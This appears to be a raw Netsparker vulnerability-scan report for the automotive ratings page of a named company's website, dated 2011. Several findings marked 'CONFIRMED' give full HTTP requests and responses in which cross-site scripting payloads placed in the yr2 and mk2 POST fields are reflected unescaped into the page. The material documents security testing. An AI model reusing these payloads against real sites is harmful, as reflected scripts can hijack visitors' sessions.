<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x0009D1)</script>" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000A17)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A17)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:44:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000A17)</script>" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>5.</td><td><span id="car5"></span>..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000A1B)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000A1B)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:44:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
